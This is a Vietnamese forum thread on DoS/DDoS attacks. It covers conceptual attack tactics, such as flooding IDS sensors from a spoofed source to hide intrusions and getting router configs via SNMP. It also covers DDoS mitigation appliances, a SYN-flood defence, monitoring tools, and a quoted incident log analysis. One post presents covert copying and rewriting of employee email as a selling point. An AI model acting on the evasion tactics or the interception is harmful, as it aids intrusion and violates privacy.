Bản thân cái tên DoS đã nói lên quá rõ ý nghĩa của nó. Ðó là tất cả các phương pháp tấn công nhằm làm cho server victim phải "từ chối phục vụ" các dịch vụ của mình. Có rất nhiều phương pháp tấn công DoS như mọi người đã giới thiệu và thảo luận, nhưng mục đích tối hậu của DoS vẫn là "làm treo" hệ thống victim. Thường thì đây là "đòn thù" cuối cùng khi mà hacker không thể đột nhập vào hệ thống được, nhưng đôi khi cũng là do hacker cố tình làm hệ thống phải reset vì một mục đích riêng nào đó (để kích hoạt một đoạn code nào đó chẳng hạn)

Chẳng hạn:


Inside Network
|
|
Firewall----------Outside router
|
|
DMZ-----Sensor
|
Public Server.

Trong mô hình mạng như thế (typical) thì DoS các Sensor để xóa dấu vết các fraud transaction của mình vào public server chẳng hạn.

Neu gap he thong co router Cisco thi minh khong the hack vo duoc hay sao ma phai dung den ddos nhu vay thi` a'c qua' chu'ng ta la` white hat thi` ne^n nhe. nha`ng thoi. Toi co' mot nguoi ba.n no'i router Cisco co' ca'ch hack cu~ng don gian la('m ma` . load file (*.config) cua router do' len thi` no se~ xuat hien het cac thong so cua router do' ra co`n neu no bi. ma~ ho'a thi` co thieu gi` tool decode lai ma~ MD5. khong biet toi hieu nhu vay co' du'ng khong nua mong ba'c chi? du`m

Nghe họ nói chuyện mà mìn ghen quá héng. Thèm được học quá, mỗi tội không tiền. Có ai có tiền đầu tư tui học NETAdmin đi ! Hiz ..

Chào Yuna,
Lâu không vào topic này nên chưa trả lời. Có lẽ bạn đã lầm người, dù sao cũng rất vui khi quen với bạn, một trong số những người tuổi trẻ tài cao tại VN. Nhân tiện cho hỏi DoS làm sao để gì để xóa dấu vết ?

Khi vượt qua tường lửa để vào DMZ, chắc chắn mục tiêu của hacker không phải ở đây mà là tường lửa thứ nhì để vào hệ thống bên trong. Back-to-back firewall là đường một chiều nên khi DMZ bị tấn công sẽ có hệ thống báo hiệu cánh cửa thứ hai sẽ đóng lại và tất cả dữ liệu trong khu vực này sẽ được upload nếu như bị phá họai. Tuy nhiên DoS tấn công mạng nhằm là tê liệt đường truyền và hệ thống trong một khoản thời gian và sẽ bị contain tại DMZ nhằm bảo đảm hoạt động hệ thống bên trong không bị gián đọan. Bản chất DoS không tàn phá hệ thống hay dữ liệu nên nếu để lại dấu vết chắc rằng không thể xóa. Ngược lại nếu xóa dữ liệu hay tàn phá hệ thống thì chắc rằng sự tấn công là tổng hợp giữa các phương pháp khác nhau. Mình không về vấn đề này lắm nên không biết suy nghĩ vậy có đúng không?
===============

Những cách chống DDoS ở đây đọc qua rất tối ưu nhưng tai sao các đại gia như Yahoo ! SCO .. cũng có khi chết vì DoS ta? Hay tại họ không biết nhưng kỹ thuật này??? :D Có anh nào có thể giải thích giúp App khong? Cám ơn trước.
Applet

Đồng ý.

Nếu là mình : Mình dùng một fraud IP address, hay nó một cách generic hơn là một Source giả để tấn công Sensor và hệ thống IDS. Sau đó mình mới tiếp tục dùng một Source khác để tất công vào bên trong nếu có.
Bạn chỉ có log của Source giả. Source thật bạn sẽ không có, vì lúc đó toàn hệ thống IDS đã chết.

Về mặt logic thì là vậy, nhưng khi làm thì phức tạp hơn :). Mình không làm người tấn công được, nhưng nếu anh học về khái niệm two-tiers firewall, sẽ gặp kiểu tấn công này.

Thân.


Rất vui được làm quen với anh, 7604, hihi, chạy FlexWan hay OSM vậy ? :D

Neu gap he thong co router Cisco thi minh khong the hack vo duoc hay sao ma phai dung den ddos nhu vay thi` a'c qua' chu'ng ta la` white hat thi` ne^n nhe. nha`ng thoi. Toi co' mot nguoi ba.n no'i router Cisco co' ca'ch hack cu~ng don gian la('m ma` . load file (*.config) cua router do' len thi` no se~ xuat hien het cac thong so cua router do' ra co`n neu no bi. ma~ ho'a thi` co thieu gi` tool decode lai ma~ MD5. khong biet toi hieu nhu vay co' du'ng khong nua mong ba'c chi? du`m


Hi.

Thứ 1 : Bạn gỏ dấu.
Thứ 2 : Vì Router hoạt động chủ yếu ở Layer 2/3/4, do đó router không phải như các server , bản thân Data đối với nó không quan trọng, Data đi qua nó như thế nào mới quan trọng.

Nếu DoS thì có thể Router sẽ bị hung.
Bạn có config của Router bằng cách nào ?
Có 2 cách.
Cách thứ 1 là Access vào được Router. Có thể thông qua Telnet hoặc Dial (nếu vô tình gặp phải hệ thống bất cẩn). Bạn vẩn phải thông qua các bước đăng nhập password đàng hoàng, vì khi cấu hình telnet or dial mà không có password, nó sẽ không cho bạn kết nối đâu ;). Và password thì sao mà bạn lấy được ? Chỉ với kỷ thuật router thì no way ;). Chưa hết, nếu có thể đang nhập được, bạn muốn show config ra thì phải vào thêm một bước nửa là vào Enable mode, ở mode này bạn mới show được ;). Do đó lại thêm một lần đang nhập nữa. và cuối cùng .... khi show running-config ra, password sẽ bị encrypt MD5, và bạn có thể forget việc giải mả MD5 thành text ;).

Cách thứ 2, bài bản hơn, là nếu hệ thống đó có chương trình quản lý chạy SNMP, bạn có thể dựa vào các lổi của SNMP string community để capture, hoặc lừa router gởi config về cho mình ;). Nhưng tất nhiên SNMP cũng có Security riêng của nó.

Không dể như mình nghĩ, vì nếu dể Cisco đã sập tiệm rồi.

Cách thứ

Cách thứ mấy nữa Yuna?

Hôm nay thấy bài này trể quá, trúng nghề... nhưng tiếc là lại tới giờ đi học rồi không có thì giờ "nổ" ở đây.

Mời các bạn nào thích về DDOS, DOS vào website hảng mình nghiên cứu. Bữa tới mình rảnh sẻ viết 1 bài ngắn về phương pháp chống lại DOS mới nhất mà không làm gián đoạn service của các server.

http://www.cloudshield.com/what_we_do/Arbor_peakflowSP_OVW.html

Xin lỗi mấy huynh nha, đệ chen chân vào đây chỉ để hỏi là, nếu như Dos như vậy thì sao mấy cái Server trên toàn thế giới không die luôn một lượt nhỉ ? và rất mong mấy huynh chỉ giúp cách để chống flood, tất nhiên không phải là tắt Modem và đổi Port.

Nói thêm là, mấy huynh đừng lo, cái dụ DoS này cũng không khó, chỉ có điều đệ thấy hai "cao thủ" kia hình như họ đang đưa các huynh, tỷ vào "Mê cung" bằng những từ chuyên nghiệp, chứ thật ra thì nó không wá khó, đệ thấy là cách ngồi Scan Port và sau đó gởi thông điệp giả cho Yahoo và hotmail là 1 cách mà bất cứ tên Fucker(*) nào cũng "thích" và cũng làm được cả

Chú thích: (*) những kẻ Flood là những kẻ chỉ cho người khác thấy là Server của họ được bảo mật đến nỗi chúng không thể làm gì hơn là Flood (trong khi người khác thì có thể)

:punk: :lick:
Mấy bác đừng có la hét và nổ quá như thế nhé... Đừng tưởng là biết như thế là giỏi rùi... nên nhớ là "kiến thức là... biển cả. Nó rộng lắm và đừng bao giờ nghĩ đến việc bơi hết nhé...."

Tôi không khẳng định là mình giỏi và những huynh, tỷ trong này cũng vậy, chẳng qua là vì bức xúc và hơn hết là tinh thần học hỏi, bạn đừng nên nói vậy

http://www.cloudshield.com/pdfs/!DS%20CS2000_Mitigator_100404.pdf

Cho phép mình nổ ở đây 1 chút nghe.

Phương pháp mới ngày nay dùng để chống DDOS attack gọi là DOS intelligent mitigration resource. Phương pháp này "hơi mắc tiền" và chỉ đặt ở core của internet nơi những router hoạt động ở OC48 - OC-192 (tương đương 2.5 Gbits -> 10 Gbits per second). Hiện giờ hệ thống này còn đang nằm trong vòng thử nghiệm và có thể đưa ra thị trường sớm nhất là khoảng tháng 3 - tháng 6 năm tới.

Điểm chính của phương pháp này là nhằm dập tắt DOS ngay từ các router gần core của internet để mau chóng ngăn DOS tràn lan trên toàn hệ thống. Và việc làm này phải được thực hiện 1 các hoàn toàn tự động và vẩn bảo đảm là những good traffic vẩn được duy trì để không làm gián đoạn các server. Vì vậy bạn C++ hỏi có thể dùng để bảo vệ modem 56K của bạn hay không. Thì mình trả lời rằng nếu ISP của bạn có trang bị hệ thống này thì bạn sẻ được tự động bảo vệ. Còn dùng hệ thống này để bảo vệ cho máy của bạn thì là chuyện rất khó khăn vì hệ thống mới này chỉ hoạt động ở cấp high speed router trở lên.

Trở lại vấn đề làm sao để build hệ thống này, mình xin giới thiệu thiết kể và nguyên tắc của hệ thống này.

Trước tiên là người ta sẻ dùng 1 thiết bị dùng để đo lường traffic của các packet đi qua router chánh (2.5 Gbit - 10 Gbit). Thiết bị này có thể chỉ là những PC chạy sniffer extract 1 phần của traffic đi qua nó, sau đó phân tích các trafic này qua các application như NetMap, hay NetFlow. Các application này chẳng qua là tính toán các loại packet đi qua hệ thống, và thiết lập 1 bản thổng kế của từng loại traffic như UDP, TCP, ICMP, VoIP..., người ta còn có thể tinh vi hơn là tính xem trong TCP/IP có bao nhiêu phần trăm là SYN/ACK... Sau đó người điều hành có thể thiết lập các ngưỡng (threshold) cho từng loại traffic đi qua hệ thống đó. Khi 1 loại traffic tự động tăng 1 cách khá nhanh hay tăng quá bất thường trên "ngưỡng" cho phép. thì lập tức thiết bị này sẻ phát hiện ra. Thiết bị này sẻ gởi thông tin tới router chánh, yêu cầu router đổi bảng route table, chuyển hết các loại traffic này qua 1 đường khác nơi có thiết bị thứ 2 có nhiệm vụ sàng lọc các traffic này.

Thiết bị thứ 2 là máy của hảng mình (DOS mitigator), và cisco cũng có 1 cái tương tự đang trong giai đoạn thử nghiệm. Thiết bị thứ hai này là 1 thiết bị có khả năng phân tích, sửa đổi, nhân đôi... tất cả các packet đi qua từ Layer 2 tới Layer 7. Thế hệ hiện tại là nó có thể xử lý packet đi qua ở tốc độ khoảng 1 Gbit/s. Thiết bị này có khả năng xem xét từng packet đi qua và coi nó có thật chất là good traffic hay bad traffic và sẻ drop những gì mà nó cho là bad. Thiết bi của Cisco thì dùng hardware điều khiển còn thiết bị của hảng mình thì dùng software điều kiển. Người ta chỉ việc viết program rồi từ program này họ sẻ quyết định sẻ làm gì với từng packet đi qua. Ở đây người ta không dùng CPU mà là dùng NPU (Network Processor Unit) 1 loại link kiện mới dùng để xử lý các packet trong networking. Những NPU này xử lý packet với 1 tốc độ vô cùng chóng mặt theo mình biết thì IXP2800 của intel có thể xử lý khoảng 10Gbit traffic đi qua. Sau khi thiết bị thứ 2 hay xem xét và filter các bad traffic thì những bad traffic sẻ bị loại bỏ hoàn toàn, nhưng traffic còn lại sẻ được đưa trở lại router và chuyển qua cho server cần thiết.

Ví dụ: (Xem hình minh hoạ ở link ở trên)

Ở router chánh của IPS của yahoo, amazon, ebay... chạy ở tốc độ 10 Gbit/s. Sau khi router xử lý xong thì chuyển qua router 2 ở tốc độ chậm hơn là 1 Gbit/s và router này là gateway chánh đi vào yahoo.com. Nếu có 1 loại virus mới nếu lây nhiểm thì sẻ dùng ICMP để tấn công yahoo.com. Ở thiết bị thứ nhất, lưu lượng ICMP packet cho phép trên hệ thống là 3% của toàn bộ trafic đi qua. Khi có attack xảy ra thì dương nhiên làm lương ICMP này sẻ tăng cao vô cùng lên vượt quá 3%. Thiết bị này sẻ update router 1 yêu cầu đưa hết toàn bộ traffic chứa ICMP tới yahoo.com chuyển qua router 3. Thiết bị thứ 2 (DOS mitigration box) đặt chính giửa router 1 và 3. sẻ xem xét các traffic đi qua. Thiết bị này có những rule ("điều lệ") ví dụ như nếu host nào trong vòng 1 giây mà gởi 1 lương ICMP packet lớn, thì host đó chính là máy đang attack thì sau khi đếm xong traffic này thì nó sẻ đưa host này vào danh sách "block". Toàn bộ ICMP của máy này sẻ bị block hoàn toàn. Thiết bị của hảng mình có thể theo dõi được trafic của 500,000 host trong cùng 1 lúc cho nên nếu nhiều máy cùng tấn công thì cũng sẻ bị block như ở trên. Những traffic nào không phạm luật thì sẻ tiếp tục chuyển tới router 3 và router 3 sẻ chuyển lại cho router 2 gateway đi vào server của yahoo. Vì vậy DOS sẻ bị dập tắt mà yahoo.com không bị ảnh hưỡng. Nói thì nói vậy, khi attack bắt đầu và tới dập tắc được attack này cũng mất từ 1 - 2 phút. Nhanh lắm thì cũng phải mất 30 giây vì nó đi qua nhiều hệ thống.

Không chỉ là ICMP mà các loại DOS khác cũng vậy, ví dụ email chứa virus chẳng hạn... khi có email chứa virus xuất hiện trên mạng, lập tức thiết bị 1 sẻ khám phá ra luợng traffic qua email tăng lên đáng kể. Nó sẻ làm tương tự là chuyển qua thiết bị 2. Ở thiết bị 2 này sẻ lấy sample của những email có nội dung giống nhau "signature của virus" sau đó đưa vào 1 bảng theo dõi đặt biệt. Với 1 PAX chip của hảng IDT chuyên dùng làm string search và pattern matching ở layer 7 có thể process những packet email ở tốc độ 10Gbit/s. Vì vậy những packet đi qua, nếu có signature mà giống như danh sách bị cấm thì lập tức sẻ bị block hoàn toàn.

Ngay cả đau đầu nhất là SYN/ACK attack cũng không thành vấn đề. Lý do là vì máy này có thể theo dõi được 500,000 host cùng 1 lúc, người dùng có thể viết 1 stateful firewall application để có thể giải quyết bài toán đau đầu này. Chuyện viết chương trình thì chỉ cần bạn hiểu về networking và network security là có thể lập trình được rồi. Với cỗng internet vào việt nam là khoảng 400 - 800 Mbit chỉ cần 1 cái là đủ rồi.

Hệ thống này khá mắc tiền cho nên chỉ dùng trên các ISP mà thôi. Giá có thể lên tới 250.000 - 500.000 cho nên không thể thực hiện ở những đường truyền có tốc độ thấp.

Trở lại thiết bị của hảng mình, các bạn có thể hình dung nó giống 1 cái PC vậy... bạn muốn làm gì thì viết program đó cho nó. Có 1 quận đã mua về thử để quản lý mạng của họ, ngay lập tức bà con vô cùng khổ sở vì không thể download nhạc, không thể coi hình bậy, và không thể dùng yahoo messager, ICQ... nhưng cái hay là không phải nó block lại hết. Nhưng viên chức cao cấp, những người làm chức năng hổ trợ vẩn có thể Chat với bên ngoài thoải mái... Thậm chí những em nào trong diện bị để ý, nếu hay viết email tiết lộ bí mật ra ngoài... sẻ có 1 ngày lên gặp xếp đọc 1 đống email mà anh ta đã từng gởi ra vì đã bị máy này copy, dupplicate lại và gởi vào database.

Trong phòng demo của hảng mình có 1 ví dụ rất hay: ở bên đây 1 người a viết email ở cho cô b --> nội dung là hẹn đi ăn cơm lúc 5 giờ chiều. Khi đi qua thiết bị này thì email đó đổ thành ra gởi cho cô c hẹn đi xem phim lúc 8 giờ tối. Khi cô C trả lời thì đi qua thiết bị này lai trở thành của cô b gởi lại cho anh a!

Nghe những chuyện này có vẻ quá nổ phải không các bạn? Nhưng với technology càng ngày càng phát triển... chẳng có gì cái "nổ" nào không trở thành sự thật đâu.

hì,

Đối với các Syn/AckDoS, hiện nay hầu hết các Firewallm IDS tiên tiến đều có thể ngăn chặn được hết, tốt nửa là khác.



Xin cho ké 1 đoạn nghe. Phương pháp mà cái firewall hay Packet Processor (của hảng mình) dùng để defend Syn/Ack là như sau.

Khi 1 client gởi Syn packet tới server, đi ngang firewall hay thiết bị này. Thiết bi này sẻ tạo ra 1 record trong database của nó (silicon database - thường là dùng CAM "constant address memory) rồi forward packet đó tới server sau đó thì thiết bị đó chờ cho server trả lời bằng Syn-Ack packet, nó forward packet này tới client, và đồng thời gởi trả lời Server bằng 1 packet Ack tự tạo ra. Lúc đó Server đã hoàn tât giai đoạn 3-way handshake nên sẻ đưa pending connection đó vào establish connection queue và chờ packet mới ở đây (establish connection queue thường rất lớn vì sử dụng thread tuỳ theo mổi server).

Sau khi gởi packet Ack tự tạo tới server, thiết bị này tiếp tục lắng nghe và theo dỏi client trong 1 thời gian nhất định có gởi trở lại Ack packet không. Nếu client gởi trở lại thì 1) là nó drop packet đó, 2) là forward tới server và server cũng sẻ drop packet đó, sau đó nó clear entry này trong silicon database. Client và Server thoải mái nói chuyện với nhau vì đã có 1 entry trong established connection queue.

Nếu sau thời gian quy định thiết bị này vẩn không gởi Ack packet tới thì thiết bị này sẻ gởi packet TCP-Reset tự tạo ra tới server. Server sẻ close connection đó trong established connection queue. Và thiết bị này cũng xoá record đó đi khỏi database. Record đó thường chứa Source + Dest IP address, Source + Dest Port.

Sử dụng phương pháp này thì sẻ loại trừ được tình trạng halfway connection ở trên của server. Nhưng giá thành cho các loại stateful firewall và thiết bị loại này rất là mắc. Ở những server trên những đường truyền chậm, các bạn có thể thực hiện phương pháp bảo vệ trên sử dụng 1 pc thực hiện những bước ở trên. Tuy không hoàn hảo như những stateful firewall, nhưng có thể bảo vệ được server của bạn khỏi bị syn-ack attack.

Đệ xin hỏi huynh là có thể dùng một loại SoftWare hay Hardware nào để hạn chế việc Flood nhưng giá rẻ không ? vì cũng như huynh đã biết là ở VN chúng ta còn rất hạn chế về chi phí

Mong mỏi chờ hồi âm

Đệ xin hỏi huynh là có thể dùng một loại SoftWare hay Hardware nào để hạn chế việc Flood nhưng giá rẻ không ? vì cũng như huynh đã biết là ở VN chúng ta còn rất hạn chế về chi phí

Mong mỏi chờ hồi âm

Không biết bạn C++ muốn nói tới việc hạn chế Flood, là hạn chế ở mức độ nào. Nếu bạn có thể nói rỏ hơn yêu cầu của bạn thì mình có thể trả lời 1 cách chính xác hơn. Mình tạm giả định ý kiến của bạn như sau:

+ Chống flood trên 1 đường truyền. Nếu chỉ nói là chống flood trên 1 đường truyền thì khó vô cùng. Flood giống như 1 cơn lủ, tràn vào cửa ngỏ của đường truyền internet nào đó. Muốn hạn chế nó 1 cách hửu hiệu thì chỉ có thể chống flood ở gần nguồn. Chứ 1 khi flood đã tràn vào 1 đường truyền thì đâu còn các nào chống ngoài tắt máy đi ngủ.
Ví dụ bạn có 1 đường truyền DSL chạy khoảng 200Kbit/s. Nhưng ở ngoài lượng traffic attack gởi vào khoảng chừng 300Kbit/s thì khó có thể mà chống lại. Phương pháp duy nhất bạn có thể làm là drop những loại traffic không cần thíêt.

Phương pháp chống flood tốt nhất là chống ở tại các ISP nơi nhận và chuyển traffic vào từng đường truyền. Nếu các router ở đây "thông minh" 1 chút thì có thể dập tắt flood. Các thế hệ router gần đây có khả năng phân tích các loại traffic đi qua mà áp dụng những filter thích hợp (Rate Shapping). Nhưng các thế hệ router này có thể là khá đắt tiền.

Những phương pháp đơn giản hiện nay mình thấy đó là người ta dùng software (Netflow, NetMap...) để tính ra các loại traffic đi qua. Khi có 1 loại tăng bất thường, thì nó có thể update router table của các router để tạm thời block 1 loại traffic nào đó khi loại traffic đó vượt quá mức quy định, hay là có thể đưa traffic đó qua những router khác nơi có những máy phân tích và gạn lọc traffic để loại bỏ những traffic xấu này. Nếu có tiền thì có thể mua những thiết bị như đã nêu ở trên. Nếu kinh tế hạn hẹp thì có thể thực hiện những máy phân tích và gạn lọc traffic này bằng các PC flatform với gigabit ethernet card và dung lượng bộ nhớ cao. Có khả năng đọc và phân tích các packet đi qua bằng software bạn tự viết ra. Theo mình dự tính 1 PC loại này có thể phân tích vào gạn lọc các traffic đi qua ở tốc độ T2 - T3. Trên thị trường hiện tại những thiết bị gan lọc bằng PC based thì chẳng ai làm vì những ISP hiện tại ở US chạy với tốc độ khác cao. Họ muốn router làm hết các chuyện đó cho nên chỉ đưa hết các khả năng chống flood này vào các thế hệ router mơí. Còn ở VN thì mình không biết như thế nào nên không dám góp ý kiến. Nếu bạn nghĩ chỉ cần xử lý ở tốc độ 20Mbit/s... bạn có thể dùng 1 PC + xây dựng 1 software dùng trên nền tảng open source để thử.

Huynh nói đúng, hiện những hệ thống Server như NetSpace chẳng hạn, mình thấy họ có 1 người chuyên ngồi trên máy để theo dõi những lưu lượng của Server để khi lưu lượng tăng một cách đột biến thì họ tắt Router và chuyển Post chẳng hạn, hiện mình rất muốn có một phần mềm giống vậy, bạn có thể nói cho mình biết phần mềm nào như vậy không ? hay có phần mềm nào thể hiện số lưu lượng đi vào Server hay không ? rất mong bạn trả lời

Mình muốn hạn chế ở mức này, ch oví dụ nghe:

Khi thấy lưu lượng quá cao mình sẽ lập tức chuyển Port để chống lại nạn flood

chỉ có thể thôi, nhưng mình không biết cách để "xem" được lưu lượng ra vào Server, rất mong đại huynh ra tay giúp đỡ

Ở đây có 1 số software dùng làm các chuyện monitor traffic, một số của cisco, 1 số khác open source. Bạn có thể từ từ ngâm cứu. Trong đó mình thấy Netflow của cisco coi bộ có thể theo dỏi traffic 1 cách hửu hiệu. Các software khác như flowscan viết bằng PERL coi bộ củng OK vì nó có thể theo dõi traffic và bandwidth...

http://www.switch.ch/tf-tant/floma/software.html

http://netflow.cesnet.cz/index.php

http://www.caida.org/tools/taxonomy/

Ý tưởng chính ở đây là dùng các software open source này, để định dạng cho hệ thống network của bạn ví dụ ở 1 thời điểm nào từng loại traffic là bao nhiêu phần trăm. Cao nhất là bao nhiêu và thấp nhất cho phép là bao nhiêu. Sau khi đưa các software monitor này vào, bạn có thể đọc được các dử liệu của những software này trong các database của chúng. Tùy theo từng trường hợp bạn có thể viết các software module tự động thay đổi route table của các router hay chuyển đổi các port, hay apply các loại filter khác nhau.

Gần như bất cứ một hệ thống monitor nào cũng có một điểm gọi là break-even. Trong trường hợp này nghĩa đơn giản là cá giá phải trả, nếu siết chặc kiểm soát thì gây khó khăn cho chính mình nhưng thả lỏng thì thì kiểm soát không chặc. Tìm ra một điểm thích hợp để vừa kiểm soát hiệu quả vừa không trở ngại hoạt động bình thường gần như là đều không dễ. Lấy thí dụ như cái soft mà Tinman đề cập đến, đúng là có lợi cho xếp khi kiểm tra hết thư từ ra vào cũng như thái độ làm việc của nhân viện nhưng lại vi phạm luật riêng tư có thể dẫn đến tòa án.

Hiện tại, gần như các monitor system đều hạn chế ở một điểm là khả năng lưu lại thông tin. Security taskforce, Mỹ, vừa thông qua một luật đòi hỏi các monitor system phải lưu lại dữ liệu. Chính vì vậy mà nhiều hãng sử dụng cisco hardware đã dùng IT-Monitor của OSI. Lưu trữ thông tin không chỉ phục vụ cho tòa án, kiện tụng mà còn giúp nguyên cứu và phát triển những kỷ thuật phòng chống từ xa. Cơn lũ trước khi vào bờ thì mặt biển phẳng lặng với những cơn sống ngầm. Tìm ra được qui luật của cơn lũ thì dù không ngăn chặn nổi cũng có thể hạn chế thiệt hại xảy ra. Mấu chốt của hệ thống bảo vệ không chỉ là phải ngăn chặn tất cả mà là giảm thiểu hậu quả trong mọi trường hợp.
=================

Phải phải, khi thấy lũ tràn vào thì cũng phải biết cách hạn chế chứ không lẽ chạy toán loạn một cách vô ý thức hay là ngồi chờ chết phải không nào ?, với Flood thì hình như không một Router nào mà không bị "chết" phải không mấy huynh ?

Thấy mấy u nói về DoS attack, tui cũng xin nói thêm một chút,mấy bồ nói vậy tuy không sai nhưng giải thích vậy chắc các newbie cũng khó hiểu, tuy tôi chưa thực hành bao giờ ,nhưng cũng đọc khá nhiều nên cũng xin lấy một bài của ngưới khác từ HAV về đây, bên đó là cả một câu chuyện về Dos Attack ,còn mấy bồ muốn tìm hiểu kĩ hơn thì mời vô qua HAV mà coi, rất thú vị :

http://www.hvaonline.net/forum/showtopic_38514_st_0.html

DoS Attack ( có thể gọi là không ăn thì đạp đổ -vì không hack được thì phá tan nó thôi) là một kĩ thuật cao,đòi hỏi phải có nhiều kiến thức ,nhất là kiến thức về lập trình và hệ thống mạng,còn về kĩ thuật thì mấy bồ kia đã nói gần hết rồi, tui chỉ xin post thêm một câu chuyện về Dos của HAV thôi, hy vọng mấy bạn thích :


From Mod comale in HAV:


Dấu hiệu
Mấy tuần lễ gần đây, đột nhiên lượng tải trên máy chủ HVA tăng vọt trong khi số lượng thành viên chính thức truy nhập diễn đàn vẫn ở mức bình thường. DoS? hay DDoS? Lượng tải này tăng vọt khá đều đặn vài giờ trong mỗi ngày. Lượng thành viên gia tăng nên có quá nhiều người cùng truy cập? không phải. HVA đang có đề tài gì hấp dẫn nên thiên hạ ùn ùn kéo vào? cũng không phải.

Dấu vết
Tôi nhận công tác điều tra và xử lý tình trạng bất bình thường này, trong đầu đã phần nào đoán sự thể do DoS. Khuya ngày 10 tháng 10, tôi log vào server của HVA và tạo ra vài console, mở ra vài cái đuôi -1-, làm một ấm trà và ngồi đó nhâm nhi... một mình. Không cần phải đợi lâu, hàng loạt thông tin từ log của web server hiện lên màn hình với một số chi tiết rất lý thú:

CODE

210.245.31.246 - - [10/Oct/2004:06:57:19 -0400] "POST /forum/ HTTP/1.0" 200 1618 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
211.199.192.157 - - [10/Oct/2004:06:57:19 -0400] "POST /forum/ HTTP/1.1" 200 1619 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; iebar)"
203.162.3.148 - - [10/Oct/2004:06:57:19 -0400] "POST /forum/ HTTP/1.1" 200 1619 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts)"
203.162.3.148 - - [10/Oct/2004:06:57:19 -0400] "POST /forum/ HTTP/1.1" 200 1619 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts)"
80.170.198.46 - - [10/Oct/2004:06:57:19 -0400] "POST /forum/ HTTP/1.1" 200 1617 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
81.66.147.0 - - [10/Oct/2004:06:57:19 -0400] "POST /forum/ HTTP/1.1"

Chà, chẳng lẽ thành viên "hối hả" kéo vào diễn đàn và "POST" bài nhiều đến vậy sao? hai mươi lăm cái "POST" trong một giây từ một vài IP? Cứ cho là hợp lệ vì thành viên ở VN đi ra Internet, qua cùng một cửa ngõ -2- là chuyện bình thường. Nhưng, hẵng đã, vừa rồi lại có một chùm đến hơn năm mươi cái "POST" đi đến trong một giây, cũng từ các IP như trên. Bất thường hay bất tường?

Tôi để yên mấy "cái đuôi" chạy trên mấy console và mở trình duyệt của mình lên, thử log vào HVA bằng nickname và password của tôi để xem thử "thái độ" POST từ máy của tôi có tương tự như những cái POST tôi nhận được vài chục giây trước đây (xác thực là bạn của nghề phân tích). Cha chả, cái POST của tôi nhìn hợp lệ hơn nhiều:

CODE

***.xx.***.98 - - [10/Oct/2004:07:11:25 +0900] "POST /forum/act_Login_CODE_01.html HTTP/1.0" 200 7405 "http://www.hvaonline.net/forum/act_Login_CODE_00.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040510"




Tôi thử mở "cái đuôi" của firewall log trên server xem có gì hấp dẫn không. Chà, log của web server vẫn "POST" vào ầm ầm nhưng firewall log thì vẫn im ắng như đỉnh Himalaya. Thôi rồi, chắc đây là một "kiểu chơi" rất hợp lệ nên firewall cho phép chúng vào thả cửa. Tôi gởi nhanh một PM đến JAL, nhờ lão phóng cái sniffer lên để "hít" -3- một ít gói tin và lưu lại một nơi thích hợp dùm tôi. Đêm đã khuya, tôi phải đi ngủ để mai còn đi làm. Sáng mai sẽ copy mớ gói tin đã được lưu và sẽ phân tích xem sự thể ra sao.

Phân tích

Ngày 11/10
Trên tàu lửa đến sở làm, tôi hăm hở mở laptop ra và bắt tay vào xem xét thông tin "bắt" được tối hôm qua. Chuyện đầu tiên đập vào mắt tôi là kích thước hồ sơ đã sniff, chà, sao nó bé tí tẹo vậy nhỉ? Sáng nay lúc tôi log vào HVA server để copy hồ sơ này, tôi đã không để ý đến kích thước (vì cứ nghĩ nó phải ít nhất là vài megabytes), tôi chỉ chạy lệnh scp và bỏ đó rồi đi thay đồ đi làm. Lúc này mới nhận ra là nó bé tí tẹo, không biết có gì trong này.

Tôi dùng Ethereal mở hồ sơ này ra, và.... đúng như dự phỏng, Ethereal phàn nàn "stream not completed". Tôi bật cười và tự nhủ: "chà, chắc lão JAL sợ nó sniff lâu quá thành một hồ sơ khổng tượng nên chỉ sniff một, hai giây rồi tắt liền". Thông tin "bắt" được từ sniffer quá ít, chỉ vỏn vẹn hơn mười dòng, trong đó có được một cái SYN -4-, một cái ACK,PSH từ một segment khác, một cái HTTP (POST) cộng thêm vài cái "continuation" từ các segment trước và sau cái SYN ở trên không thấy gì đi theo.

Xếp laptop lại, tôi trầm ngâm vài phút, có vài chi tiết cần xem lại trong mớ packets ngắn ngủi mà lão JAL đã cung cấp. Tôi lại mở laptop ra và đi xuyên qua mười mấy mảnh packets rời rạc. Không thể "gom" các packets này thành một stream hoàn chỉnh, tôi đành xem xét từng mảnh một lần nữa. Điểm lý thú đập ngay vào mắt tôi khi dò đến http packet chứa mảng đầu của phần "POST". Cha chả, POST cái gì mà lắm thế?

- payload -5- của "POST" có đến 2205 bytes?
- đoạn đầu của mảnh "POST" này có thông tin:

. Lý thú nhỉ, lý thú nhưng cũng chưa có gì rõ ràng cho lắm. Tôi hơi ngạc nhiên là tại sao mấy lão trên HVA lại để yên những http header và payload có dính ngổn ngang các "chú" ampersand -6-. Có lẽ mấy lão cho phép vì đây là phần cần thiết cho forum? Tôi chưa nắm được bao nhiêu các phần tố ngổn ngang giữa "Invision Board" và web server đứng trước, cái này phải điều tra kỹ mới được.

Thiếu các mảnh tiếp theo của đoạn POST trên, tôi đành thở dài và dừng lại vì chẳng đi tới đâu. Thôi vậy, đành phải sniff lại vì mớ thông tin này chẳng giúp được bao nhiêu



Tối 11/10
Tôi gởi PM cho lão JAL để "hít" thêm ít gói tin, lần này tôi nắm chắc phải có vài megabytes packets để ngịch. Không lâu sau đó, tôi nhận được hồi đáp từ JAL thông báo các mảnh packets đã có sẵn trên server. Tôi log vào HVA server và tải chúng xuống. Hăm hở mở đoạn "hit" thứ nhất, tôi rà xuyên qua trọn bộ các gói tin bắt được trong nhóm thứ nhất để tìm một dấu hiệu nổi bật và những dấu hiệu nào có liên quan đến đoạn payload của HTTP POST ở trên. Quá nhiều! có quá nhiều "stream" -7- từ nhiều nguồn khác nhau như mang cùng một đặc tính. Thử xem một "stream" do client IP là 203.210.233.28, dùng proxy server là 203.162.3.148 để "POST" vào server của HVA:

CODE

POST /forum/ HTTP/1.1
Accept: */*
x-flash-version: 7,0,19,0
Content-Type: application/x-www-form-urlencoded
Content-Length: 2387
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
